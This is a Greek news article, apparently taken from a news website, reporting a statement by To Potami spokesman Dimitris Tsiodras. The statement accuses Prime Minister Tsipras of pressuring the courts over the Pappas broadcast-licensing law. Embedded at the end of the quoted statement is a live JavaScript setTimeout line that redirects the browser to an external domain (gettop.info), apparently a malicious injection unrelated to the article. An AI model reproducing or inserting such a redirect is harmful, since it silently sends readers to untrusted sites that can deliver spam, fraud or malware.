Ποτάμι: Ας σταματήσουν επιτέλους να προσβάλουν τη νοημοσύνη των Ελλήνων

0
5

 

Για προσπάθεια του πρωθυπουργού να υπαγορεύσει στη Δικαιοσύνη την απόφασης που θα λάβει για το αν είναι αντισυνταγματικός ή όχι, ο νόμος Παππά για τις άδειες, κάνει λόγο το Ποτάμι και καλεί την κυβέρνηση να σταματήσει να προσβάλει τη νοημοσύνη των Ελλήνων.

Συγκεκριμένα, ο εκπρόσωπος Τύπου Δημήτρης Τσιόδρας δήλωσε:«Στην αυταρχική νοοτροπία του κ. Τσίπρα δεν χωράει η λέξη «ανεξαρτησία». Έτσι μετά την υποβάθμιση του ρόλου των ανεξάρτητων αρχών, όπως το ΕΣΡ, και την υπόδειξη στους δημοσιογράφους ποια θέματα οφείλουν να προβάλλουν, ήρθε χθες και η προσπάθεια υπαγόρευσης στη Δικαιοσύνη της απόφασης που θα λάβει για το αν είναι αντισυνταγματικός ή όχι, ο νόμος Παππά για τις άδειες.

Όλη η Ελλάδα άκουσε τον πρωθυπουργό να λέει για το ενδεχόμενο να κριθεί ο νόμος αντισυνταγματικός: «Δεν γίνονται αυτά τα πράγματα». Από το Μέγαρο Μαξίμου, αντί να παραδεχθούν το ατόπημα, προσπαθούν να πείσουν όσους παρακολούθησαν τη συνέντευξη ότι δεν κατάλαβαν καλά. Ας σταματήσουν επιτέλους να προσβάλουν τη νοημοσύνη των Ελλήνων και ας σεβαστούν τους δημοκρατικούς κανόνες που υπαγορεύουν την ανεξαρτησία της Δικαιοσύνης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here